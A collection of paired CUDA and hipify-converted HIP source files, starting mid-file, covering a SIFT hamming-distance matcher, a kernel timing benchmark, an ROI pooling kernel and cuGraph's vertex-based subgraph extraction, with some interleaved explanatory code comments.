hashData2->deviceBucketList[i * kCntBucketPerGroup + bucket_id][j]; dataIndex++; } } } } __syncthreads(); int64_t firstImageHashA, firstImageHashB, secondImageHashA, secondImageHashB; firstImageHashA = imageData1->compHashDataPtrList[index * kDimCompHashData]; firstImageHashB = imageData1->compHashDataPtrList[index * kDimCompHashData + 1]; for (int i = 0; i < int8_t((totalCandidateSiftPoints + BLOCK_SIZE - 1) / BLOCK_SIZE); i++){ if ((i * BLOCK_SIZE + threadIdx.x) < totalCandidateSiftPoints) { secondImageHashA = imageData2->compHashDataPtrList[candidateSiftPointList[i * BLOCK_SIZE + threadIdx.x] * kDimCompHashData]; secondImageHashB = imageData2->compHashDataPtrList[candidateSiftPointList[i * BLOCK_SIZE + threadIdx.x] * kDimCompHashData + 1]; candidateHammingDistance[i * BLOCK_SIZE + threadIdx.x] = __popcll(firstImageHashA ^ secondImageHashA) + __popcll(firstImageHashB ^ secondImageHashB); //if(index == 0){ //printf("hamming distance = %d \n", candidateHammingDistance[i * BLOCK_SIZE + threadIdx.x]); //} } } __syncthreads(); __shared__ uint16_t topKCandidates[kCntCandidateTopMin]; if (index < imageData1->cntPoint) { //if (threadIdx.x == 0 && index == 0) { int candidatesFoundCnt; if(threadIdx.x == 0){ //printf("image no= %d\n", imageData1->cntPoint); //printf("%d, %d\n", index, totalCandidateSiftPoints); thrust::sort_by_key(thrust::seq, candidateHammingDistance, candidateHammingDistance + totalCandidateSiftPoints, candidateSiftPointList); candidatesFoundCnt = 0; uint16_t candidate; bool duplicate; for(int i = 0; i < totalCandidateSiftPoints; i++){ duplicate = false; //printf("Index: %d, The sorted hamming distance:%d\n", i, candidateHammingDistance[i]); //printf("The corresponding point is:%d\n", candidateSiftPointList[i]); candidate = candidateSiftPointList[i]; for(int j = 0; j < candidatesFoundCnt; j++){ if(candidate == topKCandidates[j]) { 
duplicate = true; } } if(duplicate == true){ continue; } topKCandidates[candidatesFoundCnt] = candidate; candidatesFoundCnt++; if(candidatesFoundCnt == kCntCandidateTopMin) { break; } } //printf("max = %d, \n", max); for(int i = 0; i < candidatesFoundCnt; i++){ //if (index == 100) //printf("index: %d, The candidate is %d\n", index, topKCandidates[i]); deviceCandidateList[index * kCntCandidateTopMin + i] = topKCandidates[i]; } deviceCandidateCntList[index] = candidatesFoundCnt; } } if(threadIdx.x == 0 && index < imageData1->cntPoint){ delete[] candidateSiftPointList; } } void compute_hamming_distance_GPU(ImageData *deviceptr1, ImageData* deviceptr2, HashData *hashData1, HashData *hashData2, int siftCount, uint16_t* deviceCandidateList, uint8_t* deviceCandidateCntList){ dim3 block(BLOCK_SIZE); dim3 grid(siftCount); hamming_distance_kernel<<<grid, block>>>(deviceptr1, deviceptr2, hashData1, hashData2, deviceCandidateList, deviceCandidateCntList); //hamming_distance_kernel<<<grid, block>>>(deviceptr[4], deviceptr[5], hashData1, hashData2, deviceCandidateList, deviceCandidateCntList); //cudaDeviceSynchronize(); } */ void compute_hashes_serial(ImageData **device_ptr, ImageData *host_ptr ,int img_cnt, float *d_firstProjMat, float *d_secondProjMat, float *firstProjMat){ //Serial //for (int dataIndex = 0; dataIndex < host_ptr->cntPoint; dataIndex++) //{ // // obtain pointers for SIFT feature vector, Hash code and CompHash code // SiftDataPtr siftDataPtr = host_ptr->siftDataPtrList[dataIndex]; // int bucketID = 0; // // determine the bucket index for each bucket group // for (int m = 0; m < kCntBucketGroup; m++) { // bucketID = 0; // for (int j = 0; j < kCntBucketBit; j++) { // float sum = 0.0f; // for (int k = 0; k < kDimSiftData; k++) { // if (i == 0 && dataIndex == 0 && m == 0) { // //std::cout << "proj data inside fun" << firstProjMat[m * kDimSiftData * kCntBucketBit + j * kDimSiftData + k] << std::endl; // //printf("sift data = %d, proj data = %f\n", siftDataPtr[k], firstProjMat[m * kDimSiftData * kCntBucketBit + j * kDimSiftData + k]); // } // if (siftDataPtr[k] != 0) { // sum += siftDataPtr[k] * firstProjMat[m * kDimSiftData * kCntBucketBit + j * kDimSiftData + k]; // } // } // // if (i == 0 && dataIndex == 0 && m == 0) { // printf("sum = %f\n", sum); // } // bucketID = (bucketID << 1) + (sum > 0 ? 
1 : 0); // } // if (i == 0 && dataIndex == 0 && m == 0) { // printf("===============index = %d, group index = %d, bucket id = %d, image no = %d\n===================", dataIndex, m, bucketID, i); // } // } //} // } // //typedef struct StructA { // SiftDataPtr *arrval; // int flag; //} StructA; // //__global__ void kernel(StructA *in) { // // for (int i = 0; i < 2; i++) { // //printf("flag val = %d\n", in[i].flag); // //printf("address = %p\n", in[i].arrval); // for (int j = 0; j < 3; j++) { // for (int k = 0; k < 5; k++) { // //printf("address = %p\n", &in[i].arrval[j * 5 + k]); // //printf("val = %d\n", in[i].arrval[j * 5 + k]); // printf("val = %d\n", d_arrval[i][j * 5 + k]); // } // } // printf("-------------------------------------------\n"); // } //} // //void call_kernel_test2() //{ // StructA *h_a, *d_a; // // printf("h_a address:%p\n", h_a); // h_a = (StructA*)malloc(2 * sizeof(StructA)); // printf("h_a address:%p\n", h_a); // // for (int i = 0; i < 2; i++) { // printf("h_a[%d] arrval address:%p\n", i, h_a[i].arrval); // h_a[i].arrval = (SiftDataPtr*)malloc(3 * sizeof(SiftDataPtr)); // printf("h_a[%d] arrval address:%p\n", i, h_a[i].arrval); // for (int j = 0; j < 3; j++) { // h_a[i].arrval[j] = (int*)malloc(5 * sizeof(int)); // } // } // // int counter = 0; // for (int i = 0; i < 2; i++) { // for (int j = 0; j < 3; j++) { // for (int k = 0; k < 5; k++) { // counter += 1; // h_a[i].arrval[j][k] = counter; // } // //printf("\n"); // } // h_a[i].flag = counter; // } // // /*for (int i = 0; i < 2; i++) { // for (int j = 0; j < 8; j++) { // for (int k = 0; k < 5; k++) // printf("val = %d\t", h_a[i].arrval[j][k]); // printf("\n"); // } // printf("-------------------------------------------\n"); // }*/ // // // 1. Allocate device array. // // size_t sz = 0; // cudaDeviceGetLimit(&sz, cudaLimitMallocHeapSize); // printf("heap size:%ld\n", sz); // // cudaMalloc(&d_a, sizeof(StructA) * 2); // CUDA_CHECK_ERROR; // cudaMemcpy(d_a, h_a, sizeof(StructA) * 2, cudaMemcpyHostToDevice); // CUDA_CHECK_ERROR; // // int *d_arrval[2]; // // for (int i = 0; i < 2; i++) { // cudaMalloc(&d_arrval[i], 3 * 5 * sizeof(int)); // cudaMemcpy(&d_a[i].arrval, &d_arrval[i], sizeof(int*), cudaMemcpyHostToDevice); // for (int j = 0; j < 3; j++) { // cudaMemcpy(&d_arrval[i][j], h_a[i].arrval[j], 5 * sizeof(int), cudaMemcpyHostToDevice); // } // } // // // 4. Call kernel with host struct as argument // kernel<<<1, 1>>>(d_a); // // // 5. Copy pointer from device to host. // //cudaMemcpy(h_arr, d_arr, sizeof(int)*10, cudaMemcpyDeviceToHost); // // // 6. 
Point to host pointer in host struct // // (or do something else with it if this is not needed) // //h_a.arr = h_arr; // //} // //class Particle //{ //public: // double *_w; //}; // //__global__ void test(Particle *p) { // // int idx = threadIdx.x + blockDim.x*blockIdx.x; // // if (idx == 2) { // printf("dev_p[2]._w[2] = %f\n", p[idx]._w[2]); // } //} // //void call_kernel_test3() //{ // int nParticles = 100; // Particle *dev_p; // double *w[nParticles]; // cudaMalloc((void**)&dev_p, nParticles * sizeof(Particle)); // CUDA_CHECK_ERROR; // // for (int i = 0; i < nParticles; i++) { // cudaMalloc((void**)&(w[i]), 300 * sizeof(double)); // CUDA_CHECK_ERROR; // cudaMemcpy(&(dev_p[i]._w), &(w[i]), sizeof(double *), cudaMemcpyHostToDevice); // CUDA_CHECK_ERROR; // } // double testval = 32.7; // cudaMemcpy(w[2] + 2, &testval, sizeof(double), cudaMemcpyHostToDevice); // CUDA_CHECK_ERROR; // test << <1, 32 >> >(dev_p); // cudaDeviceSynchronize(); // CUDA_CHECK_ERROR; // printf("Done!\n"); //}
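// The (commented-out) hamming_distance_kernel above compares two 128-bit
// CompHash codes as two uint64_t halves, XORing them and counting differing
// bits with __popcll. A minimal device helper expressing that distance;
// kDimCompHashData is assumed to be 2, matching the indexing used above.
#include <cstdint>
#include <cuda_runtime.h>

__device__ inline int CompHashHammingSketch(const uint64_t* a, const uint64_t* b)
{
    // popcount of the XOR gives the number of differing hash bits per 64-bit word
    return __popcll(a[0] ^ b[0]) + __popcll(a[1] ^ b[1]);
}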
efc02d5569f8a4b70fd226593cc7c95db643de39.hip
// !!! This is a file automatically generated by hipify!!!
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <getopt.h>
#include <hiprand/hiprand_kernel.h>
#include <stdlib.h>
#include <hip/hip_runtime.h>
#include <sys/time.h>
#include "ge_inv_sqrt.cu"
#include <chrono>
#include <iostream>

using namespace std;
using namespace std::chrono;

int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}};
int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}};

int main(int argc, char **argv) {
    hipSetDevice(0);
    char *p;
    int matrix_len = strtol(argv[1], &p, 10);
    for (int matrix_looper = 0; matrix_looper < matrix_len; matrix_looper++) {
        for (int block_looper = 0; block_looper < 20; block_looper++) {
            int XSIZE = matrices_[matrix_looper][0], YSIZE = matrices_[matrix_looper][1], BLOCKX = blocks_[block_looper][0], BLOCKY = blocks_[block_looper][1];
            const int sd = 1;
            const int fd = 1;
            const REAL *a = NULL;
            hipMalloc(&a, XSIZE*YSIZE);
            const int offset_a = 1;
            const int ld_a = 1;
            REAL *b = NULL;
            hipMalloc(&b, XSIZE*YSIZE);
            const int offset_b = 1;
            const int ld_b = 1;
            int iXSIZE = XSIZE;
            int iYSIZE = YSIZE;
            while (iXSIZE % BLOCKX != 0) {
                iXSIZE++;
            }
            while (iYSIZE % BLOCKY != 0) {
                iYSIZE++;
            }
            dim3 gridBlock(iXSIZE / BLOCKX, iYSIZE / BLOCKY);
            dim3 threadBlock(BLOCKX, BLOCKY);
            hipFree(0);
            hipLaunchKernelGGL(( ge_inv_sqrt), dim3(gridBlock), dim3(threadBlock), 0, 0, sd, fd, a, offset_a, ld_a, b, offset_b, ld_b);
            hipDeviceSynchronize();
            for (int loop_counter = 0; loop_counter < 10; ++loop_counter) {
                hipLaunchKernelGGL(( ge_inv_sqrt), dim3(gridBlock), dim3(threadBlock), 0, 0, sd, fd, a, offset_a, ld_a, b, offset_b, ld_b);
            }
            auto start = steady_clock::now();
            for (int loop_counter = 0; loop_counter < 1000; loop_counter++) {
                hipLaunchKernelGGL(( ge_inv_sqrt), dim3(gridBlock), dim3(threadBlock), 0, 0, sd, fd, a, offset_a, ld_a, b, offset_b, ld_b);
            }
            auto end = steady_clock::now();
            auto usecs = duration_cast<duration<float, microseconds::period> >(end - start);
            cout << '[' << usecs.count() << ',' << '(' << BLOCKX << ',' << BLOCKY << ')' << ',' << '(' << XSIZE << ',' << YSIZE << ')' << ']' << endl;
        }
    }
}
efc02d5569f8a4b70fd226593cc7c95db643de39.cu
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <getopt.h>
#include <curand_kernel.h>
#include <stdlib.h>
#include <cuda.h>
#include <sys/time.h>
#include "ge_inv_sqrt.cu"
#include <chrono>
#include <iostream>

using namespace std;
using namespace std::chrono;

int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}};
int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}};

int main(int argc, char **argv) {
    cudaSetDevice(0);
    char *p;
    int matrix_len = strtol(argv[1], &p, 10);
    for (int matrix_looper = 0; matrix_looper < matrix_len; matrix_looper++) {
        for (int block_looper = 0; block_looper < 20; block_looper++) {
            int XSIZE = matrices_[matrix_looper][0], YSIZE = matrices_[matrix_looper][1], BLOCKX = blocks_[block_looper][0], BLOCKY = blocks_[block_looper][1];
            const int sd = 1;
            const int fd = 1;
            const REAL *a = NULL;
            cudaMalloc(&a, XSIZE*YSIZE);
            const int offset_a = 1;
            const int ld_a = 1;
            REAL *b = NULL;
            cudaMalloc(&b, XSIZE*YSIZE);
            const int offset_b = 1;
            const int ld_b = 1;
            int iXSIZE = XSIZE;
            int iYSIZE = YSIZE;
            while (iXSIZE % BLOCKX != 0) {
                iXSIZE++;
            }
            while (iYSIZE % BLOCKY != 0) {
                iYSIZE++;
            }
            dim3 gridBlock(iXSIZE / BLOCKX, iYSIZE / BLOCKY);
            dim3 threadBlock(BLOCKX, BLOCKY);
            cudaFree(0);
            ge_inv_sqrt<<<gridBlock, threadBlock>>>(sd, fd, a, offset_a, ld_a, b, offset_b, ld_b);
            cudaDeviceSynchronize();
            for (int loop_counter = 0; loop_counter < 10; ++loop_counter) {
                ge_inv_sqrt<<<gridBlock, threadBlock>>>(sd, fd, a, offset_a, ld_a, b, offset_b, ld_b);
            }
            auto start = steady_clock::now();
            for (int loop_counter = 0; loop_counter < 1000; loop_counter++) {
                ge_inv_sqrt<<<gridBlock, threadBlock>>>(sd, fd, a, offset_a, ld_a, b, offset_b, ld_b);
            }
            auto end = steady_clock::now();
            auto usecs = duration_cast<duration<float, microseconds::period> >(end - start);
            cout << '[' << usecs.count() << ',' << '(' << BLOCKX << ',' << BLOCKY << ')' << ',' << '(' << XSIZE << ',' << YSIZE << ')' << ']' << endl;
        }
    }
}
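// The benchmark above records steady_clock timestamps around 1000 kernel
// launches without synchronizing before the end timestamp, so it mostly
// measures launch/enqueue cost. Below is a sketch of event-based timing that
// also covers device execution; the REAL type, the ge_inv_sqrt kernel and the
// launch configuration are reused from the benchmark above, not redefined here.
#include <cuda_runtime.h>

float TimeLaunchesMsSketch(dim3 gridBlock, dim3 threadBlock, int iters,
                           int sd, int fd, const REAL* a, int offset_a, int ld_a,
                           REAL* b, int offset_b, int ld_b)
{
    cudaEvent_t start, stop;
    cudaEventCreate(&start);
    cudaEventCreate(&stop);
    cudaEventRecord(start);
    for (int i = 0; i < iters; ++i) {
        ge_inv_sqrt<<<gridBlock, threadBlock>>>(sd, fd, a, offset_a, ld_a,
                                                b, offset_b, ld_b);
    }
    cudaEventRecord(stop);
    cudaEventSynchronize(stop);  // wait for all launches to finish on the device
    float ms = 0.0f;
    cudaEventElapsedTime(&ms, start, stop);
    cudaEventDestroy(start);
    cudaEventDestroy(stop);
    return ms;
}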
a6fbd22ebfacd5bd1987368cc85dd6c9a5427119.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "roi_pooling_op.hpp" namespace Shadow { namespace Vision { #if defined(USE_ROCM) template <typename T> __global__ void KernelPOIPooling(const T *in_data, int count, const T *roi_data, int in_c, int in_h, int in_w, int pooled_h, int pooled_w, float spatial_scale, T *out_data) { CUDA_KERNEL_LOOP(globalid, count) { int pw = globalid % pooled_w; int ph = (globalid / pooled_w) % pooled_h; int c = (globalid / pooled_w / pooled_h) % in_c; int n = globalid / pooled_w / pooled_h / in_c; roi_data += n * 5; int roi_batch_id = static_cast<int>(roi_data[0]); int roi_start_w = static_cast<int>(round(roi_data[1] * spatial_scale)); int roi_start_h = static_cast<int>(round(roi_data[2] * spatial_scale)); int roi_end_w = static_cast<int>(round(roi_data[3] * spatial_scale)); int roi_end_h = static_cast<int>(round(roi_data[4] * spatial_scale)); int roi_height = max(roi_end_h - roi_start_h + 1, 1); int roi_width = max(roi_end_w - roi_start_w + 1, 1); T bin_size_h = roi_height / static_cast<T>(pooled_h); T bin_size_w = roi_width / static_cast<T>(pooled_w); int hstart = static_cast<int>(floor(ph * bin_size_h)); int wstart = static_cast<int>(floor(pw * bin_size_w)); int hend = static_cast<int>(ceil((ph + 1) * bin_size_h)); int wend = static_cast<int>(ceil((pw + 1) * bin_size_w)); hstart = min(max(hstart + roi_start_h, 0), in_h); hend = min(max(hend + roi_start_h, 0), in_h); wstart = min(max(wstart + roi_start_w, 0), in_w); wend = min(max(wend + roi_start_w, 0), in_w); bool is_empty = (hend <= hstart) || (wend <= wstart); in_data += (roi_batch_id * in_c + c) * in_h * in_w; T max_val = is_empty ? 0 : in_data[hstart * in_w + wstart]; for (int h = hstart; h < hend; ++h) { for (int w = wstart; w < wend; ++w) { max_val = max(max_val, in_data[h * in_w + w]); } } out_data[globalid] = max_val; } } template <typename T> void ROIPooling(const T *in_data, const VecInt &in_shape, const T *roi_data, int num_rois, int pooled_h, int pooled_w, float spatial_scale, T *out_data) { int in_c = in_shape[1], in_h = in_shape[2], in_w = in_shape[3]; int count = num_rois * in_c * pooled_h * pooled_w; hipLaunchKernelGGL(( KernelPOIPooling<T>), dim3(GetBlocks(count)), dim3(NumThreads), 0, 0, in_data, count, roi_data, in_c, in_h, in_w, pooled_h, pooled_w, spatial_scale, out_data); CUDA_CHECK(hipPeekAtLastError()); } template void ROIPooling(const float *in_data, const VecInt &in_shape, const float *roi_data, int num_rois, int pooled_h, int pooled_w, float spatial_scale, float *out_data); #endif } // namespace Vision } // namespace Shadow
a6fbd22ebfacd5bd1987368cc85dd6c9a5427119.cu
#include "roi_pooling_op.hpp" namespace Shadow { namespace Vision { #if defined(USE_CUDA) template <typename T> __global__ void KernelPOIPooling(const T *in_data, int count, const T *roi_data, int in_c, int in_h, int in_w, int pooled_h, int pooled_w, float spatial_scale, T *out_data) { CUDA_KERNEL_LOOP(globalid, count) { int pw = globalid % pooled_w; int ph = (globalid / pooled_w) % pooled_h; int c = (globalid / pooled_w / pooled_h) % in_c; int n = globalid / pooled_w / pooled_h / in_c; roi_data += n * 5; int roi_batch_id = static_cast<int>(roi_data[0]); int roi_start_w = static_cast<int>(round(roi_data[1] * spatial_scale)); int roi_start_h = static_cast<int>(round(roi_data[2] * spatial_scale)); int roi_end_w = static_cast<int>(round(roi_data[3] * spatial_scale)); int roi_end_h = static_cast<int>(round(roi_data[4] * spatial_scale)); int roi_height = max(roi_end_h - roi_start_h + 1, 1); int roi_width = max(roi_end_w - roi_start_w + 1, 1); T bin_size_h = roi_height / static_cast<T>(pooled_h); T bin_size_w = roi_width / static_cast<T>(pooled_w); int hstart = static_cast<int>(floor(ph * bin_size_h)); int wstart = static_cast<int>(floor(pw * bin_size_w)); int hend = static_cast<int>(ceil((ph + 1) * bin_size_h)); int wend = static_cast<int>(ceil((pw + 1) * bin_size_w)); hstart = min(max(hstart + roi_start_h, 0), in_h); hend = min(max(hend + roi_start_h, 0), in_h); wstart = min(max(wstart + roi_start_w, 0), in_w); wend = min(max(wend + roi_start_w, 0), in_w); bool is_empty = (hend <= hstart) || (wend <= wstart); in_data += (roi_batch_id * in_c + c) * in_h * in_w; T max_val = is_empty ? 0 : in_data[hstart * in_w + wstart]; for (int h = hstart; h < hend; ++h) { for (int w = wstart; w < wend; ++w) { max_val = max(max_val, in_data[h * in_w + w]); } } out_data[globalid] = max_val; } } template <typename T> void ROIPooling(const T *in_data, const VecInt &in_shape, const T *roi_data, int num_rois, int pooled_h, int pooled_w, float spatial_scale, T *out_data) { int in_c = in_shape[1], in_h = in_shape[2], in_w = in_shape[3]; int count = num_rois * in_c * pooled_h * pooled_w; KernelPOIPooling<T><<<GetBlocks(count), NumThreads>>>( in_data, count, roi_data, in_c, in_h, in_w, pooled_h, pooled_w, spatial_scale, out_data); CUDA_CHECK(cudaPeekAtLastError()); } template void ROIPooling(const float *in_data, const VecInt &in_shape, const float *roi_data, int num_rois, int pooled_h, int pooled_w, float spatial_scale, float *out_data); #endif } // namespace Vision } // namespace Shadow
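KernelPOIPooling above iterates with CUDA_KERNEL_LOOP, a macro defined in a header that is not part of this pair; judging from the CUDA_1D_KERNEL_LOOP definition in the RROIAlign file further down, it is the usual grid-stride loop. The sketch below shows that pattern in isolation with a hypothetical fill kernel: a fixed-size grid strides through the index space, so one launch covers any element count.

#include <cuda_runtime.h>
#include <cstdio>

// Grid-stride loop: each thread handles indices i, i + stride, i + 2*stride, ...
__global__ void fill(float* out, int n, float value) {
    for (int i = blockIdx.x * blockDim.x + threadIdx.x; i < n;
         i += blockDim.x * gridDim.x) {
        out[i] = value;                        // one element per iteration
    }
}

int main() {
    const int n = 1 << 20;
    float* d_out = nullptr;
    cudaMalloc((void**)&d_out, n * sizeof(float));
    fill<<<64, 256>>>(d_out, n, 1.0f);         // far fewer threads than elements is fine
    cudaDeviceSynchronize();
    float sample = 0.f;
    cudaMemcpy(&sample, d_out, sizeof(float), cudaMemcpyDeviceToHost);
    printf("out[0] = %f\n", sample);           // prints 1.000000
    cudaFree(d_out);
    return 0;
}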
f330bc560449cbbbafe1a94abea217edc8f389ae.hip
// !!! This is a file automatically generated by hipify!!! /* * Copyright (c) 2020-2021, NVIDIA CORPORATION. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <cugraph/algorithms.hpp> #include <cugraph/legacy/graph.hpp> #include <cugraph/utilities/error.hpp> #include <raft/device_atomics.cuh> #include <rmm/device_vector.hpp> #include <rmm/exec_policy.hpp> namespace { template <typename vertex_t, typename edge_t, typename weight_t, bool has_weight> std::unique_ptr<cugraph::legacy::GraphCOO<vertex_t, edge_t, weight_t>> extract_subgraph_by_vertices( cugraph::legacy::GraphCOOView<vertex_t, edge_t, weight_t> const& graph, vertex_t const* vertices, vertex_t num_vertices, hipStream_t stream) { edge_t graph_num_verts = graph.number_of_vertices; rmm::device_vector<int64_t> error_count_v{1, 0}; rmm::device_vector<vertex_t> vertex_used_v{graph_num_verts, num_vertices}; vertex_t* d_vertex_used = vertex_used_v.data().get(); int64_t* d_error_count = error_count_v.data().get(); thrust::for_each( rmm::exec_policy(stream), thrust::make_counting_iterator<vertex_t>(0), thrust::make_counting_iterator<vertex_t>(num_vertices), [vertices, d_vertex_used, d_error_count, graph_num_verts] __device__(vertex_t idx) { vertex_t v = vertices[idx]; if ((v >= 0) && (v < graph_num_verts)) { d_vertex_used[v] = idx; } else { atomicAdd(d_error_count, int64_t{1}); } }); CUGRAPH_EXPECTS(error_count_v[0] == 0, "Input error... vertices specifies vertex id out of range"); vertex_t* graph_src = graph.src_indices; vertex_t* graph_dst = graph.dst_indices; weight_t* graph_weight = graph.edge_data; // iterate over the edges and count how many make it into the output int64_t count = thrust::count_if( rmm::exec_policy(stream), thrust::make_counting_iterator<edge_t>(0), thrust::make_counting_iterator<edge_t>(graph.number_of_edges), [graph_src, graph_dst, d_vertex_used, num_vertices] __device__(edge_t e) { vertex_t s = graph_src[e]; vertex_t d = graph_dst[e]; return ((d_vertex_used[s] < num_vertices) && (d_vertex_used[d] < num_vertices)); }); if (count > 0) { auto result = std::make_unique<cugraph::legacy::GraphCOO<vertex_t, edge_t, weight_t>>( num_vertices, count, has_weight); vertex_t* d_new_src = result->src_indices(); vertex_t* d_new_dst = result->dst_indices(); weight_t* d_new_weight = result->edge_data(); // reusing error_count as a vertex counter... thrust::for_each(rmm::exec_policy(stream), thrust::make_counting_iterator<edge_t>(0), thrust::make_counting_iterator<edge_t>(graph.number_of_edges), [graph_src, graph_dst, graph_weight, d_vertex_used, num_vertices, d_error_count, d_new_src, d_new_dst, d_new_weight] __device__(edge_t e) { vertex_t s = graph_src[e]; vertex_t d = graph_dst[e]; if ((d_vertex_used[s] < num_vertices) && (d_vertex_used[d] < num_vertices)) { // NOTE: Could avoid atomic here by doing a inclusive sum, but that would // require 2*|E| temporary memory. If this becomes important perhaps // we make 2 implementations and pick one based on the number of // vertices in the subgraph set. 
auto pos = atomicAdd(d_error_count, int64_t{1}); d_new_src[pos] = d_vertex_used[s]; d_new_dst[pos] = d_vertex_used[d]; if (has_weight) d_new_weight[pos] = graph_weight[e]; } }); return result; } else { return std::make_unique<cugraph::legacy::GraphCOO<vertex_t, edge_t, weight_t>>( 0, 0, has_weight); } } } // namespace namespace cugraph { namespace subgraph { template <typename VT, typename ET, typename WT> std::unique_ptr<legacy::GraphCOO<VT, ET, WT>> extract_subgraph_vertex( legacy::GraphCOOView<VT, ET, WT> const& graph, VT const* vertices, VT num_vertices) { CUGRAPH_EXPECTS(vertices != nullptr, "Invalid input argument: vertices must be non null"); hipStream_t stream{0}; if (graph.edge_data == nullptr) { return extract_subgraph_by_vertices<VT, ET, WT, false>(graph, vertices, num_vertices, stream); } else { return extract_subgraph_by_vertices<VT, ET, WT, true>(graph, vertices, num_vertices, stream); } } template std::unique_ptr<legacy::GraphCOO<int32_t, int32_t, float>> extract_subgraph_vertex<int32_t, int32_t, float>( legacy::GraphCOOView<int32_t, int32_t, float> const&, int32_t const*, int32_t); template std::unique_ptr<legacy::GraphCOO<int32_t, int32_t, double>> extract_subgraph_vertex<int32_t, int32_t, double>( legacy::GraphCOOView<int32_t, int32_t, double> const&, int32_t const*, int32_t); } // namespace subgraph } // namespace cugraph
f330bc560449cbbbafe1a94abea217edc8f389ae.cu
/* * Copyright (c) 2020-2021, NVIDIA CORPORATION. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <cugraph/algorithms.hpp> #include <cugraph/legacy/graph.hpp> #include <cugraph/utilities/error.hpp> #include <raft/device_atomics.cuh> #include <rmm/device_vector.hpp> #include <rmm/exec_policy.hpp> namespace { template <typename vertex_t, typename edge_t, typename weight_t, bool has_weight> std::unique_ptr<cugraph::legacy::GraphCOO<vertex_t, edge_t, weight_t>> extract_subgraph_by_vertices( cugraph::legacy::GraphCOOView<vertex_t, edge_t, weight_t> const& graph, vertex_t const* vertices, vertex_t num_vertices, cudaStream_t stream) { edge_t graph_num_verts = graph.number_of_vertices; rmm::device_vector<int64_t> error_count_v{1, 0}; rmm::device_vector<vertex_t> vertex_used_v{graph_num_verts, num_vertices}; vertex_t* d_vertex_used = vertex_used_v.data().get(); int64_t* d_error_count = error_count_v.data().get(); thrust::for_each( rmm::exec_policy(stream), thrust::make_counting_iterator<vertex_t>(0), thrust::make_counting_iterator<vertex_t>(num_vertices), [vertices, d_vertex_used, d_error_count, graph_num_verts] __device__(vertex_t idx) { vertex_t v = vertices[idx]; if ((v >= 0) && (v < graph_num_verts)) { d_vertex_used[v] = idx; } else { atomicAdd(d_error_count, int64_t{1}); } }); CUGRAPH_EXPECTS(error_count_v[0] == 0, "Input error... vertices specifies vertex id out of range"); vertex_t* graph_src = graph.src_indices; vertex_t* graph_dst = graph.dst_indices; weight_t* graph_weight = graph.edge_data; // iterate over the edges and count how many make it into the output int64_t count = thrust::count_if( rmm::exec_policy(stream), thrust::make_counting_iterator<edge_t>(0), thrust::make_counting_iterator<edge_t>(graph.number_of_edges), [graph_src, graph_dst, d_vertex_used, num_vertices] __device__(edge_t e) { vertex_t s = graph_src[e]; vertex_t d = graph_dst[e]; return ((d_vertex_used[s] < num_vertices) && (d_vertex_used[d] < num_vertices)); }); if (count > 0) { auto result = std::make_unique<cugraph::legacy::GraphCOO<vertex_t, edge_t, weight_t>>( num_vertices, count, has_weight); vertex_t* d_new_src = result->src_indices(); vertex_t* d_new_dst = result->dst_indices(); weight_t* d_new_weight = result->edge_data(); // reusing error_count as a vertex counter... thrust::for_each(rmm::exec_policy(stream), thrust::make_counting_iterator<edge_t>(0), thrust::make_counting_iterator<edge_t>(graph.number_of_edges), [graph_src, graph_dst, graph_weight, d_vertex_used, num_vertices, d_error_count, d_new_src, d_new_dst, d_new_weight] __device__(edge_t e) { vertex_t s = graph_src[e]; vertex_t d = graph_dst[e]; if ((d_vertex_used[s] < num_vertices) && (d_vertex_used[d] < num_vertices)) { // NOTE: Could avoid atomic here by doing a inclusive sum, but that would // require 2*|E| temporary memory. If this becomes important perhaps // we make 2 implementations and pick one based on the number of // vertices in the subgraph set. 
auto pos = atomicAdd(d_error_count, int64_t{1}); d_new_src[pos] = d_vertex_used[s]; d_new_dst[pos] = d_vertex_used[d]; if (has_weight) d_new_weight[pos] = graph_weight[e]; } }); return result; } else { return std::make_unique<cugraph::legacy::GraphCOO<vertex_t, edge_t, weight_t>>( 0, 0, has_weight); } } } // namespace namespace cugraph { namespace subgraph { template <typename VT, typename ET, typename WT> std::unique_ptr<legacy::GraphCOO<VT, ET, WT>> extract_subgraph_vertex( legacy::GraphCOOView<VT, ET, WT> const& graph, VT const* vertices, VT num_vertices) { CUGRAPH_EXPECTS(vertices != nullptr, "Invalid input argument: vertices must be non null"); cudaStream_t stream{0}; if (graph.edge_data == nullptr) { return extract_subgraph_by_vertices<VT, ET, WT, false>(graph, vertices, num_vertices, stream); } else { return extract_subgraph_by_vertices<VT, ET, WT, true>(graph, vertices, num_vertices, stream); } } template std::unique_ptr<legacy::GraphCOO<int32_t, int32_t, float>> extract_subgraph_vertex<int32_t, int32_t, float>( legacy::GraphCOOView<int32_t, int32_t, float> const&, int32_t const*, int32_t); template std::unique_ptr<legacy::GraphCOO<int32_t, int32_t, double>> extract_subgraph_vertex<int32_t, int32_t, double>( legacy::GraphCOOView<int32_t, int32_t, double> const&, int32_t const*, int32_t); } // namespace subgraph } // namespace cugraph
